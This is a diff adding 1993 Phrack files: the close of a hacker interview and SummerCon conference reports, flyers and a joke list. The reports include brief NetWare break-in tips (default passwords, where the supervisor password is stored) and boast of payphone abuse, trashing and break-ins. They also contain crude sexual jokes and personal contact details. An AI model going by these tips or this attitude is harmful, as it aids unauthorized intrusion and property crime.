+     My favorite boards were the ones where there was a lot of activity, and
+     a lot of trust between the users.  While a board that doesn't crash
+     all the time is important, an expensive computer does not a good
+     board create.
+
+     There are a lot of people who I would like to mention that have helped
+     me greatly and who I have known for a very long time:
+
+     Lex Luthor - Just because you're paranoid doesn't mean people
+                  AREN'T out get you.
+
+     Mark Tabas - He really does look like Tom Petty.
+
+     Bill from RNOC - Should sell used cars.
+
+     RC Modeler - I hold you wholly responsible for the Clashmaster incident :)
+
+     Tuc - Well, he's just Tuc.  What else can you say?
+
+     X-Man - Is he an FBI agent yet?
+
+     Karl Marx - Only person I know with his own dictionary entry.
+                 Next:  the social register.
+
+     Mr. Bigchip - Who is that?  (I'm sure you are all asking)
+
+     The Videosmith - (see entry for Luthor, L.)
+
+     Parmaster - Should have followed Lex's advice.
+
+     Kerrang Kahn - His accent is finally gone.
+
+     Terminal Man - So long and thanks for all the codes.  (This man
+                    knew The Condor?)
+
+     The Marauder - Has taken up permanent residence on IRC.
+
+     Shatter, Pad, Gandalf - PSS Junkies.  What those guys wouldn't
+                             do for an NUI.
+
+     New York - Don't Mess With Texas
+
+     Everyone Else - Sorry I couldn't think of anything clever to say.
+
+     One I would like single out is Erik Bloodaxe, who I have known over the
+     phone for 9 years now, but will meet for the first time at this year's
+     Summercon, if I get there.  [Ed: He didn't make it]
+
+     Also:  for you hackers that have disappeared from my life, you who had
+     my number, my parents' number has never changed, you can contact me
+     through them if you like, I would love to hear from you.
+
+How do you see the future of the Underground?
+
+     It's not going to go away.  There will always be new challenges.  There
+     are always new toys for curious minds.  There may be a split into
+     several different, only partially interlocking 'undergrounds' involving
+     different types of technological playing.  In spite of Caller-ID and
+     advanced security functions of the new digital switches, there will
+     still be many ways to phreak around the phone system:  taking advantage
+     of the old Crossbars in remote areas, and by finding some of the
+     'pheatures' in new switches.
+
+     Hacking on the Internet will always be around despite who controls the
+     net, though I am sure there would be a lot more destructive hacking if
+     the mega-corporations take it over.  Security of systems is more a social
+     problem than a technological one, there is always a segment of the
+     population that is gullible, stupid, or corrupt.  There will always be
+     some smartass out there making trouble for the Organization.  Constantly
+     evolving systems and brand new systems will present security holes forever,
+     though they may be harder to understand as the systems grow more complex.
+     With more computers networked there will be a lot more to play with.
+
+     Socially, I am worried about the huge wars that have developed,
+     LOD v. MOD, etc.  While hackers have always been contentious, as well
+     they should be, the ferocity of attacks has me somewhat stunned.  I will
+     leave out blames and suggestions here, but I will just make the
+     observation that as any community grows large in size, the intimacy
+     that it enjoys will be diminished.
+
+     When the underground was small, isolated, and revered as black magicians
+     by outsiders, it was as though we were all part of some guild.  Now that
+     there are many more people who have knowledge of, and access to, the
+     hacker community, there is little cohesiveness.  I see this getting
+     worse.  The solution may be tighter knit groups.  But an outbreak of
+     wars between mega-gangs could be a real catastrophe.
+
+     The cyberpunk aesthetic seems to have captivated the underground.
+     Some people have to be aware that the community was here before William
+     Gibson was patron saint, and that most of us still can't successfully
+     "rustle credit" - which means this is a hobby, not a profession.
+     Will this change?  Slowly, I imagine.  The trendies will get tired and
+     find something else to pretend to be, (maybe dinosaurs, given
+     the current popularity of Jurassic Park), and only the hard-core hackers
+     will be left.  Some of us may, in time, turn into computer criminals,
+     to which I am indifferent, as it won't be me.  The current cyber-hysteria
+     has attracted a whole bunch of trendy fakes, and is distracting us from
+     what originally brought us, most of us anyway, to hacking/phreaking in
+     the first place - the insatiable curiosity, the dance of the mind
+     unbounded.
+
+     Will the hype die?  Time will tell.  Sometimes I get so sick of the crap
+     I see on IRC that I wish someone would give me back an apple IIe and
+     an applecat 212, and set me back down in 1984.  Just call me
+     over the hill.
+
+Any end comments?
+
+     Hacking is the art of esoteric quests, of priceless and worthless
+     secrets.  Odd bits of raw data from smashed machinery of intelligence
+     and slavery reassembled in a mosaic both hilarious in its absurdity
+     and frightening in its power.
+
+-----------=?> Doctor Who <?=-----------
\ No newline at end of file
diff --git a/phrack43/7.txt b/phrack43/7.txt
new file mode 100644
index 0000000..fbef5e8
--- /dev/null
+++ b/phrack43/7.txt
@@ -0,0 +1,1204 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 7 of 27
+
+                                CONFERENCE NEWS
+                                    PART I
+
+****************************************************************************
+
+            The Missouri Programmers' Convention Transcripts
+
+                      Compiled by Synapse 403
+
+For those of you who were at the con, or moreover were at the con
+and can remember it (Sir Lance?), these transcripts are for you.
+They are not absolute in their accuracy and are most likely full
+of holes, however please keep in mind they are the transcribed
+product of a hacker who is suffering from a hangover of heroic
+proportions, and is typing to keep his mind off the mutiny
+happening in his stomach.
+
+
+Please note that within the transcripts you will find parts of
+the speaker's words paraphrased, this is not intended to
+misrepresent them, this is simply an easy way to cut to the chase
+and get this job done.  Another note to make is that with in this
+transcript, several people have been labeled unknown, this is
+either due to I could not see their face while they were speaking
+or they wished to remain anonymous.  These folks will be labeled
+"unknown" keep in mind that this is for the above reasons and not
+any slight, or K-RaD At|T|_|D3.
+
+                           SummerCon
+
+Introductions on camera were the essential beginning of the
+meeting, with Drunkfux wandering counter clockwise through the
+room, pointing the camera (that he was clinically joined with),
+in your face and asking your name and to say a bit about yourself.
+
+Surprisingly enough there was little adverse reaction to this
+aside from a few quiet jokes in relation to people wondering how
+much $ Drunkfux would be getting from SRI for the tape <G>
+
+Stuart Hauser from SRI, Stanford Research Inst. was the first
+speaker of the day, he was (or is) a older looking man who looked
+relaxed and confident.  He was here to tell us about SRI and their
+goals (or he was here to milk the crowd for info, depends who you
+talk to I suppose).
+
+SRI is an international corporation, employing over 3000
+people, that claims no ties to the Feds, NSA , CIA or any other
+government arm interested in harming, persecuting or even
+prosecuting the hacker community.
+
+Their main concern is major network security, on a corporate
+level.  However there was talk of SRI having contract work for
+military related arms producers this was not brought up at the
+conference.
+
+He started by talking about himself and SRI, he mentioned their
+policy and their feelings towards dealing with the hacker
+community on a productive level.  He went on to confirm, that
+someone we all know or know of that works for the same company is an
+asshole, and we are not the only community to realize this.  I
+will leave his name out for reasons of privacy, however a good
+hint for those who were not at scon and are reading this his first
+name starts with DON.
+
+After allowing us all to laugh this over he went to tell us of
+the finding of his teams research form SRI.  His team consisted of
+himself, Doug Web, and Mudhead, they were tasked to compile a
+report on the computer underground in some nebulous fashion, he
+was of course (at least to me and everyone I was sitting with)
+not very clear with this.  To the best of our knowledge the report
+was like a damage potential report, ie:  How much can the hackers
+really do, and HOW much will the hackers do?
+
+Stu conceded that the networks and companies had more to fear
+from corporate espionage at the hands of employees and
+mismanagement then they did from hackers.  However he fears a
+new breed of hackers he says are becoming a reality on the nets,
+the hacker for cash, digital criminals.  He felt that this new
+breed of hacker will be counterproductive for the both the PD
+world and the underground on the basis that if they destroy it
+for the corps, we cannot use it either.
+
+In the way of security Stuart felt the Social engineering was
+the biggest weakness of any system, and the most difficult to
+defend against.  Also he felt too much info about machines and
+security of them was public info, also public info was available
+for use in social engineering.  He felt that the only way to
+combat this is to make the employees and owners of companies more
+aware of these threats.  Beyond the social engineering he feels
+that physical measure are too weak at most facilities and do not
+protect there hardcopy data well enough he meant this both for
+Trashing and actual b&e situations again he felt the situation
+was to spread awareness.
+
+While conducting the interviews to for this report Stuart formed
+his own opinion of the hacker which he shared with us.  He feels
+that hackers for the most part are not malicious at all, and are
+actually decent members of cyberspace.  Moreover he feels that
+hackers should be put to work as opposed to put to jail.
+Something we all feel strongly about.  Stuart finished his speech with
+brief allusions to scholarships and upcoming programs, at this point he
+left the floor open to questions.  The are as follows:
+
+Emmanuel Goldstien:  "Earlier you (Stuart) mentioned the existence
+of 'malicious hackers', where are they?"
+
+Stu:  "Holland, Scandinavia, the UK poses a great threat,
+Israel, Australia.  The bloc countries for virii and piracy are very
+busy right now, We have to wonder what will happen when they get full
+access to our nets.  What happens when the eastern bloc catches
+up?"
+
+Unknown:  "Who finances this".
+
+Stuart: "Really that's none of your business" (paraphrased <G>)
+
+Unknown:  "Where is the evidence of these so called malicious
+hackers, I think the whole malicious hacker idea is spawned by the
+media to justify the persecution of hackers".
+
+Stuart:  [Has no chance to reply]
+
+Control-C:  (interjects) "Punk kids are all over the place doing it
+man."
+
+KL:  "its common knowledge that it is happening there."
+
+Stu:  (offers example) Was told that at three companies have tried
+to hire tiger teams, for corporate breaches however he has no proof
+of this.   Yet he feels the sources were reliable.
+
+Unknown:  "I have heard rumors that SRI is writing software to
+catch hackers.  is this true?"
+
+Stu:  Says he hasn't heard about this.  However if they are more
+interested in what SRI is doing he will be  sticking around until
+this afternoon or evening.  And has about 15 copies of the report that
+are available to the public.
+
+                      Next speaker
+
+[I was out of the room for this speaker and asked Black Kat to
+type this in, so your guess is as good as mine.]
+
+Someone showed a DES encryption laptop, 8 months old, with a built in
+chip to encrypt everything in and out (modem, disk, etc).  Didn't have
+an overhead projector but was giving personal demos.  Made by BCC
+(Beaver Computing Company) out of California.  Doesn't advertise, but
+will give sales brochures etc, if you call the 800 number.
+Thinks the govt is discouraging wide scale distribution.
+
+                     Count Zero & RDT
+
+Count Zero announced he would be talking on a unique telco
+feature they found and about packet radio.  Stickers and
+board adds from RDT and cDc were handed out at this time.
+
+White Knight and Count0 started by introducing a bizarre
+telco feature they came across, and played a tape recording to
+demonstrate some of its features to the crowd.  After some chatter with
+the rest of the con, nothing definite was concluded, however, some
+good ideas are brought out.  (As well as some insight by folks who have
+discovered similar systems.)
+
+Next came some comic relief from Count0 and White Knight in the
+way of the termination papers of an employee from a telco, the
+employees case report was read to the crowd and essentially painted the
+picture of a really disgruntled and ornery operator.  Specifics were read,
+and people laughed at the shit this guy had gotten away with, end of
+story.
+
+Following this Count0 spoke for Brian Oblivion who could not be
+there about an American Database/social program called America 2000.
+Brian came across this information by the way of a group in Penn state,
+the program is meant to monitor the attitudes of students, and how
+they behave with within state standards..
+
+Furthermore the Database is compiled without the knowledge or
+permission of parents, beyond this the file can stay with a man
+or woman for life, in the hands of the state.
+
+                      Count0 on Packet Radio
+                     Self-empowering Technology
+
+Next came the actual Packet radio discussion, Count0 displayed
+his hardware and talked at great length on a whole spectrum of issues
+related to the radio packet switching, and some points while straying,
+even the morality of the FCC.  This went on for quite some time.
+Count0 instructed the crowd on the principle behind packet switch
+radio as well as explaining which licenses to get and to apply.
+
+                  Drunkfux, Merchandising
+
+Drunkfux
+
+Drunkfux started by, Merchandising a shitload of ho-ho con
+shirts, 15$ a piece as well as mthreat his tonloc shirts, also selling the
+mods for the Mistubishi 800, mthreat also had a chip preprogrammed for
+the Mits 800 avail.  Those who could not get the mod were told to get it
+from cypher.com in /pub/vind.  He told us of the new Metal Land revival and
+said a bit about it.
+
+Next and most interesting was the discussion of the fate of
+Louis Cypher, and his companions in the recent bust.  It seems Cypher
+and ALLEGED accomplices Doc and JP have been charged with numerous
+felonies not which the least of is Treasury Fraud and b&e of a federal
+post office.  Drunkfux went into detail on how they had been turned
+on, and essentially entraped into the situation.  Also how the media as
+per usual had made a witch hunt out of it by connecting Doc to the a
+remote relation to the Kennedys etc, etc.
+
+                    Eric Neilson with CPSR
+
+Eric Nielson started by telling the crowd what had drawn him to
+the CPSR, by the way of reading a discussion in congress about a
+congressman defending the strength of a Starwars network by stating that the
+gov had an excellent example for security: the phone networks in the
+USA.  Needless to say Eric had little faith in this analogy <G>.
+
+He went on to describe what the CPSR covers and what they have
+done recently in the of the clipper debate, Sundevil and other 1st
+Amend. issues.  He discussed the internal workings of CPSR and its
+funding police as well as telling Conf Members how to go about joining.
+
+                         Erik Bloodaxe
+
+Erik started out with explaining why Phrack 43 is not yet out.
+This is due to the fact that Stormking.com will not allow it to be mailed
+from it, seeing as the owner does telco consulting and feels it would
+be a conflict of interest.  Furthermore he won't give the listserve to
+the Phrack Staff, making it somewhat difficult to distribute.  However KL
+is acting as a mediator and hopefully this will be settled soon.
+Mindvox was considered but rejected as a choice, for fear of people
+getting a hold of the list..
+
+On the issue of Phrack and the copyright, Erik had only ONE fed
+register out of all those who collect it.  However Phrack has
+obtained logs of both CERT forwarding Phrack by mail, as well as Tymnet
+obtaining the mag.
+
+Beyond this Agent Steel was discussed in an "I told you so
+fashion" it turns out that him being accused of being a narc in the past
+were valid, seeing it was proved by way of documentation that Agent
+ratted out Kevin Poulsen (Dark Dante) resulting in his current 19
+charges.
+
+And of Course the new LOD issue was broached, however very
+little was discussed on it and it was simply agreed to a large degree that
+Cameron (lord Havoc) must have been seriously abused as a child to
+display the type of obvious brain damage he is afflicted with now.
+
+                       Emmanuel Goldstein 2600
+
+Emmanuel Goldstein in his purple Bellcore shirt discussed with us
+his appearance before a Congressional hearing on a panel with Don
+Delaney and how the hostility shown towards him by the house
+representatives in session.  Beyond this he went on to describe several
+nasty letter letters sent to him by telcos for PUBLIC info he had posted
+in the winter issue of 2600.  This is a very brief summary of what he had to
+say, mainly due to the fact that I was too busy listening to him to
+concentrate my apologies go to those who were interested in
+reading the whole thing.
+
+
+Next up was a lengthy discussion on Novel Software and its
+weaknesses, By Erreth Akbe however the speaker he wished me to leave
+this out of the transcripts so I will respect his wishes in this.
+
+                ********End Of Transcript***********
+
+I would like to thank the following for making the Con an
+experience for me that I will not soon forget:
+
+Arist0tle, Black Kat, Butler, Control-C, Erreth Akbe, Tommydcat,
+the Public and theNot.   Thx guys.
+
+Please send all responses to Besaville@acdm.sait.ab.ca
+
+*****************************************************************************
+
+Presenting :::
+
+      SummerCon 1993 in Review !!!
+
+Hacking Tales and Exploits by the SotMESC
+
+Additional Activities by the GCMS MechWarriors
+
+-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
+
+     The weather was right, too right.  Something was foul in the
+air.  It was akin to that mythical 'Calm before the Storm' scenario
+that is dreaded by so many.  But, Scribbles and I boarded the
+Techno-Laden SotMESC compact and took off down the Highway to our
+ultimate goal . . . Hacker Heaven in Summertime Fun - SummerCon !!!
+
+     Instantly, weather was seen brewing in the Caribbean.  Hints
+of Hurricanes echoed through the towns we drifted through.  To
+alleviate any anxieties, massive quantities of Jolt! were obtained
+in the infamous town of Hatties-Gulch, a small town taken over by
+the virulent filth called College Students.
+
+     The trip continued, over hill and over dale.  Dale was quite
+considerate not to press charges.  Colleges were passed in a blink
+of the eye.  Nothing was going to stop us.  We were on a mission
+from the Church.  But, that's another story.
+
+     After locating that famous arch, a beeline was made at speeds
+over 100 MPH through St. Louis until our destination came into
+view: The St. Louis Executive International (800-325-4850).  We
+came to meet our nemesis and friends at the fest hosted by the
+Missouri Programming Institute.  Brakes were quickly applied
+as the car appeared to be going off the off-ramp and into the ditch.
+
+     From the lobby it was obvious, there were unusual people here.
+These were the kind of people that you fear your daughters would
+never meet.  The kind of people that kicked themselves into
+caffeine frenzies and would become infatuated with virtual lands.
+Yes, these were my kind of people.
+
+     Now, the adventure may start . . .
+
+     Oh, and in response to A-Gal on pg 30 of 2600, Scribbles
+says she's the sexiest hacker on the nets.  Hmmmmm, I'm inclined
+to agree with that.  I'm sure Control-C will agree too, especially
+after he trailed her for half of SCon.
+
+     Now, we all know that Friday is the warm-up day on what we can
+expect to see at SCon during the main Saturday drag.  It was no
+surprise to find the main junction box rewired, pay-phones providing
+free services, rooms rerouted and computers running rampant down the
+hallways.  But, the traditional trashing of Control-C's room this
+early signaled that more would be needed to top the night.  The
+maid was definitely not pleased.
+
+     For a list of those that attended, maybe KL can provide us
+with that information.  There were too many faces for my fingers
+to lap into.  And, there were quite a few new faces.  I believe
+that Weevil was the youngest hacker at 16, and Emmanuel was the
+oldest, although he didn't give his age.
+
+     -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
+
+                         THE CONFERENCE
+
+     -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
+
+     Let's get to the meat of the matter.  The conference had
+a nice spacious central area with tables neatly lining alongside
+the wall.  Between the tables and the walls were many hacks packed
+as tightly as they could get.  Why didn't we think of moving the tables
+closer together ???
+
+     KL took control and ran the conference smoothly.  dFx panned
+everyone on his digital camcorder.  Several cameras were around
+to provide us with gifs later.  And the conference took off . . .
+
+
+     First up was Stuart from SRI (Stanford Research Institute).
+He elaborated on SRI's being involved in research, engineering and
+design.  From studies done around the world with hackers and those
+associated, malicious hacking can not be stopped.  There is no
+evidence, though, that the current hackers are interested in
+bringing the networks down at all.  Concern was given to new
+hackers that may be emerging with financial gain and maliciousness
+occurring.  The top security hole with system was noted as
+being the infamous social engineering technique.  SRI did note
+that many places did not utilize the security that they even had
+in place.  It was also noted that laws against malicious hackers,
+and probably any hacker, should be fair and just.  The most
+malicious hacks that are turning up have been spotted in the
+following named countries: Holland, Scandinavia countries,
+very possibly soon in the UK, Australia, Israel, the former USSR,
+and Bulgaria ( noted for virii writers ).
+
+     A voice made mention of Operation Rahab, hackers in German Intelligence.
+
+     Next up was Count Zero from cDc/RDT to talk about packet
+radio.  His talk included information about the IESS and handed
+out a flyer on America 2000 ( school under 1984 regimes ).
+Maybe someone will provide us with a copy of this.  A packet
+radio modem at 1200 can be obtained easily for $50.  TCP/IP
+packets are already being send over the bandwidth along with
+other network protocols.  The usefulness of all this is that
+the information is broadcast and it is virgin territory.  The
+baud limitation is due only based upon the bandwidth you are
+operating at and the number of collisions occurring.  On a
+band you can see every packet that is being transmitted if
+you wish.  All this is located on a 2 meter band.  Currently
+the FCC forbids encryptions on the airwaves, although this is
+noted as being virtually impossible to enforce.   It also takes
+5 months to get an amateur radio license, and your personal info
+is recorded in a book easily obtained at libraries.  The problem
+with going around the FCC is that there exist vigilante HAMs that
+monitor the bands and have nothing better to do than filter
+info and whine to the FCC.  Bandwidths are decreasing though.
+This is due to an increased interest overall by communications
+in these areas.  Unless you do something major the FCC will
+not give you much interest.  The book on preparing yourself for
+a Tech Class can be obtained from Radio Shack for $9.
+
+     Next up was dFx.  He was promoting the HCon and Tone-Loc
+t-shirts that were for sale.  Merchandising was getting pretty
+high.  He also gave out a few Mitsubishi 800 disks.  He was
+also recognized as the ONLY and LAST member of the Neon Knights,
+a club that had a wide range of comedy names generated.  The
+word was put out the HCon '93 will be in December 17-19 with
+a hint that it could also wind up being in Austin.  Then the
+conversation turned to Lord Byron's bust, which we should here
+more information on any day this week.  The conversation
+reiterated the government narc that was at the AA meeting
+that was pressuring Byron.  Byron was also noted as having
+rejected a plea bargain the courts offered him.  And lastly,
+it is going to happen soon so get them while you can.  The
+FTP site at eff.org will be dropping its CuD directory due
+to a conflict of interest with EFFs major contributors, mainly
+the RBOCs and other interest groups that don't like us.
+
+     Erik Bloodaxe took the table next to talk about what
+was happening with his involvement with Phrack and some
+interesting info about Agent Steel.  As for Phrack, the
+Email list is being with-held by Tuc.  The mailing list
+has been refused at Mindvox due to files missing mysteriously
+at that site.  And, no organization registered for Phrack #42
+since it was copyrighted with a nice and lengthy preamble,
+except for one company from Mitre.  Currently Phrack #43 is
+in limbo and is estimated at 1 Meg long.  Going onto the
+info about Agent Steel, basically he's a narc.  Lord Havok from
+Canada is trying to restart the LOD under some unknown
+logical rationale that since LOD is defunct, anyone can
+reclaim the name.  Lord Havoc, aka Cameron, has been going
+around trying to get documentation to put together an LOD
+technical journal #5.  Supposedly there is a skin-head group
+in Canada that in now tracking Cameron down.
+
+     Someone came up next [Minor Threat] and gave us an update on
+Codec.  Two weeks after the last SCon, Codec was pulled over while
+on the run from the law for speeding and then arrested for
+burglary, resisting arrest, etc . . .  He is estimated to
+be out of jail in 1995 and still has time to serve in a few
+other states.  Mail can be sent to him at this address:
+codec@cypher.com.  Maybe Crunch can give Codec some hints on
+how to get by in prison?
+
+       From the CPSR, Eric Nielson took the table.  He elaborated
+on the CPSR and ran a Q&A period.  Basically, the CPSR files many
+FOIA requests and sues the government.  Their focus is on the
+workplace computing.  Elaboration was given on the Clipper Chip
+and computer ship security.  The CPSR is staffed with lawyers
+and takes their funding from dues and grants.  They are not
+sponsored by any corporations.
+
+     From the far side of the table came the infamous Emmanuel
+Goldstein from 2600.  He stated how he had testified at congress and
+gave them a live demonstration of bandwidth scanning and redboxing.
+While he was there, the inquisition started against him on the
+issue of 2600.  Emmanuel then tried to explain the culture to
+our representative that it is bad to classify all hackers as
+criminals.  Goldstein then went on to talk about the DC 2600 bust
+and how it has resulted in 2600 meetings springing up all across
+the country.  A review of several films on software piracy at
+the office, disaster recovery and viruses from Commonwealth
+Films was given.  And, to highlight everything, 2600 has purchased
+an AT&T van that they plan to take to assorted conventions and
+start a fleet of these up.
+
+     Pst, BTW, on pg 43 of 2600 the intersection should be a jump =:)
+
+     Last up was Erreth Akby, a Certified Netware Engineer.  He
+explained that the only upgrade in Novell 4.0 is the disk compression.
+He also informed us that the supervisor and guest accounts generally
+have default passwords.  TO hack into this Net, you should use a PC
+with full alt and functions keys.  The supervisor p/w is on the
+RConsole in a file called autoexec.mcf on version 3.11.  Netcrack
+will not work on a system with Intruder Lock-Out.  Non-dedicated
+netware must boot from a floppy.  Best of all, you can dial out
+by using cubix-quarts, which are PC with modems on the system.
+
+     Below is a quick reprint of a paper that was recovered
+from Control-C's trashed room.
+
+Mrs Jasnagan,
+
+     I would like to set up a meeting
+to discuss Kevin's progress in Social
+Studies and English.  Please let
+me know when it would be
+convenient.
+
+                 Thank you
+
+                      ( Scribble , scribble )
+
+Dear Mr + Mrs Gormby,
+
+     We would be happy
+to meet with you at
+9:30 on Thursday, April
+1st in Room 104
+
+                     Sincerely,
+                         M.Jarnagin
+                            &
+                         S.Dietrich
+
+
+     Now, could this be Kevin Poulson ???  Naaa, no way.
+Amazing what technical data trashing will uncover.  I guess
+I should throw this away now . . .
+
+     After the convention, there was much rejoicing.  The reasons
+would become fairly obvious as a 'swingers party' sign was soon
+located outside one of the hotel wings.  Yes, it would be a very
+good convention.
+
+     Several people made their way to the vehicles for a long
+night of trashing and raiding of the various FedEx, UPS and
+other assorted boxes around town.  Other groups made their
+way to computers that were trying to connect with anything
+they could out in town.  There were also those that reluctantly
+went to the mall to take advantage of the local population.
+
+     What did not happen ???  Control-C did not get laid, but
+it was rumored that there were a few 12-year olds wandering
+around the hotel looking for this legendary hacker.  No deaths
+had occured, the fires were kept to a minimum and nothing major
+was noted as being broken.
+
+     One thing was for sure, there were a lot of alcoholic
+beverages going around, walkie-talkies, scanners, and wild
+tales.  Several area buildings were broken into, but nothing
+major was done.
+
+     Then the shit hit the fan.  It seems several hackers had riled
+the swingers into a frenzy.  I guess the swingers couldn't swing
+with it.  What happened ???  Phones went ringing room to room and
+radios blared to life that the cops were here !!!  At count, there
+were 6 cops, 1 sheriff and 4 hotel employees that started patrolling
+the hallways.  Yes, we were under room arrest at our own convention
+in our own wing.  Anyone that left there room was told to stay there
+or they would be arrested.  The cops were very insistent that no
+pictures were to be taken.  The swingers had broken our balls.
+
+     But, this would not stop us.  Soon, there was a phone network
+going on with radio interfaces.  The windows opened and a few migrated
+to other locations of the hotel.  After a while, the authorities left
+feeling satisfied that they had intimidated us.  They didn't.
+
+     After they left, the hallways erupted again.  In the SotMESC
+room a gathering turned out to watch several techno-infested
+videos.  At the cDc room were others viewing the HoHoCon '92 film
+that dFx brought down with him.  At one point, the microwave
+around the lobby was detonated and a mysterious stack of Credit
+Card carbons was found.  The liberated phones were being
+utilized to their full international extent, and several of the
+soda machines decided to give out a few free drinks.
+
+     But, we couldn't leave well enough alone.  Sir Lance went
+to the lobby and took a picture of the hotel Asst. Manager.
+I guess this guy didn't like his photo being taken, since he
+turned around and called the cops on Sir Lance.  Down the hallway
+the cops came, dragging Sir Lance back with them.  In the end,
+the cops explained to the Asst. Manager that it was not a crime
+in the US to take pictures of people.
+
+     In another related story, Kaos Wizard wound up calling the
+SotMESC room with a wild plea for help.  It seemed he was with
+a large group of trashers that included Albatross, Intrepid,
+Forced Entry, Zippy, The Public and more.  Kaos was at a Central
+Office close to the hotel on Woodson and needed help.  He had
+taken off to take a piss and noticed that the trashers were
+surrounded by cops when he returned.  There was no way he was going
+back with all those cops there ( and, might I mention, there was
+also a police dog ).  Mystic Moos gathered up a few people and
+went to rescue Kaos Wizard as the rest of the trashers returned
+to the hotel.  It seems they had eluded the cops by telling them
+that they were waiting for their friend to return from taking
+a bathroom break ( Kaos Wizard ).  Unfortunately, he never
+returned.  The cops let them go eventually.  Mystic Moos rescued
+Kaos Wizard, and the hotel was aglow in activity again.
+
+     Control-C came down the hall at one point to make a startling
+discovery.  It seems that at a local club there was a band playing
+that featured 'Lex Luthor'.  The elusive X-LOD founder had been
+located.  AFter some thought, it was decided he could stay there
+and sing the blues while the rest of us partied the night away.
+
+     For those interested, the hotel fax is 314-731-3752.
+
+     One of the police officers detaining us was S.M. Gibbons.
+
+     IBM will send a 36 page fax to the number you give them.
+To activate, call 1-800-IBM-4FAX.  As you can imagine, it wasn't
+long before the hotels fax ran out of thermal paper.
+
+     Below is a gathering of Flyers . . .
+
+HoHoCon '92 Product Ordering Information
+
+If you are interested in obtaining either HoHoCon shirts or videos,
+              please contact us at any of the following:
+
+             drunkfux@cypher.com
+             hohocon@cypher.com
+             cDc@cypher.com
+             dfx@nuchat.sccsu.com
+             359@7354 (WWIV Net)
+
+                    HoHoCon
+               1310 Tulane, Box #2
+                 Houston, Tx
+                  77008-4106
+
+                713-468-5802 (data)
+
+The shirts are $15 plus $3 shipping ($4 for two shirts).  At this
+time, they only come in extra large.  We may add additional sizes if
+there is a demand for them.  The front of the shirt has the following
+in a white strip across the chest:
+
+                   I LOVE FEDS
+
+( Where LOVE = a red heart, very similar to the I LOVE NY logo )
+
+                 And this on the back:
+
+                   dFx & cDc Present
+
+                    HoHoCon '92
+
+                  December   18-20
+                  Allen Park Inn
+                  Houston, Texas
+
+There is another version of the shirt available with the following:
+
+                  I LOVE WAREZ
+
+The video includes footage from all three days, is six hours long and
+costs $18 plus $3 shipping ($4 if purchasing another item also).
+Please note that if you are purchasing multiple items, you only need
+to pay one shipping charge of $4, not a charge for each item.  If
+you wish to send an order in now, make all checks or money orders
+payable to O.I.S., include your phone number and mail it to the street
+address listed above.  Allow a few weeks for arrival.
+
+Thanks to everyone who attended and supported HoHoCon '92.  Mail us if
+you wish to be an early addition to the HoHoCon '93 (December 17-19)
+mailing list.
+
+
+
+       Calvary                         Black Crawling Systems
+       617-267-2732                    617-482-6356
+
+                     ATDT EAST
+                   617-350-STIF
+
+         DemOnseed sez: "Call ATDT East or I'll crush your skull"
+
+                                       Home of -= RDT...
+
+
+Trailings to follow . . .  Slug, slug, slugfest . . .
+
+Join the ranks of the Cons: HoHoCon, MardiCon, SummerCon !!!
+
+****************************************************************************
+
+            Top 25 Things I Learned at SummerCon '93
+                --------------------------------
+                          By Darkangel
+
+
+     SummerCon is a place where many hackers from all over the
+world meet to discuss the current state of hacking today, and to
+drink themselves under the table.  Every year, pages and pages of
+useful information is passed and traded among the participants.
+In this brief summery, I will attempt to point out the things
+that I learned and I thought were the most helpful to the whole
+hacker community. I hope you enjoy it.
+
+     #1)  DON'T let Control-C within 15 feet of any person that
+     does not have a penis.
+
+     #2)  Knight Lightning will have a stroke before the age of
+     30.
+
+     #3)  French Canadians ALWAYS sound drunk.
+
+     #4)  Loops do not make good pickup lines.
+
+     #5)  The Zenith is outside the window.  Just look up.
+
+     #6)  Smoking certain herbs is still illegal in St. Louis.
+
+     #7)  If you see a taxi and think it might be a cop, it
+     probably is.
+
+     #8)  Hotel Security is worse than Mall Security.
+
+     #9)  The payphones in the lobby are not meant to be free.
+
+     #10)  Do not climb through the ceiling to get to the room
+     with the PBX in it.
+
+     #11)  Do not glue the locks shut on an entire floor of the
+     hotel. (especially when people are in them)
+
+     #12)  This machine is broken.
+
+     #13)  Do not dump bags you got trashing on the floor of
+     someone else's room.
+
+     #14)  St. Louis police do not appreciate the finer points of
+     Simplex lock hacking.
+
+     #15)  VaxBuster should never be allowed to drink Everclear.
+
+     #16)  Scribbles has a very nice ass.
+
+     #17)  Do not photograph Pakistani hotel security guards.
+
+     #18)  Do not try to bring a six pack through customs.
+
+     #19)  Loki is the Fakemail God.
+
+     #20)  Do not rip the phone boxes out of the walls and cut
+     the wires.
+
+     #21)  Barbie Doll pornos can be cool.
+
+     #22)  Frosty can do weird things with techno and movies.
+
+     #23)  Always remove the mirrors from the walls to check for
+     hidden cameras.
+
+     #24)  Do not threaten or harass other people staying at the
+     same hotel.  This can be bad.
+
+     #25)  I really don't think the hotel will let us come back.
+
+     That wraps it up!  See you at HoHoCon!
+
+                                       -Darkangel
+
+***************************************************************************
+
+                             Hack-Tic Presents
+
+                               H A C K I N G
+
+                          at the   E N D   of the
+
+                              U N I V E R S E
+
+                   1993 SUMMER CONGRESS, THE NETHERLANDS
+
+=========================================================================
+
+HEU?
+
+Remember the Galactic Hacker Party back in 1989? Ever wondered what
+happened to the people behind it? We sold out to big business, you
+think. Think again, we're back!
+
+That's right. On august 4th, 5th and 6th 1993, we're organizing a
+three-day summer congress for hackers, phone phreaks, programmers,
+computer haters, data travellers, electro-wizards, networkers, hardware
+freaks, techno-anarchists, communications junkies, cyberpunks, system
+managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez
+dudes, law enforcement officers (appropriate undercover dress required),
+guerilla heating engineers and other assorted bald, long-haired and/or
+unshaven scum. And all this in the middle of nowhere (well, the middle
+of Holland, actually, but that's the same thing) at the Larserbos
+campground four meters below sea level.
+
+The three days will be filled with lectures, discussions and workshops
+on hacking, phreaking, people's networks, Unix security risks, virtual
+reality, semafun, social engineering, magstrips, lockpicking,
+viruses, paranoia, legal sanctions against hacking in Holland and
+elsewhere and much, much more. English will be the lingua franca for
+this event, although one or two workshops may take place in Dutch.
+There will be an Internet connection, an intertent ethernet and social
+interaction (both electronic and live). Included in the price are four
+nights in your own tent. Also included are inspiration, transpiration, a
+shortage of showers (but a lake to swim in), good weather (guaranteed by
+god), campfires and plenty of wide open space and fresh air. All of this
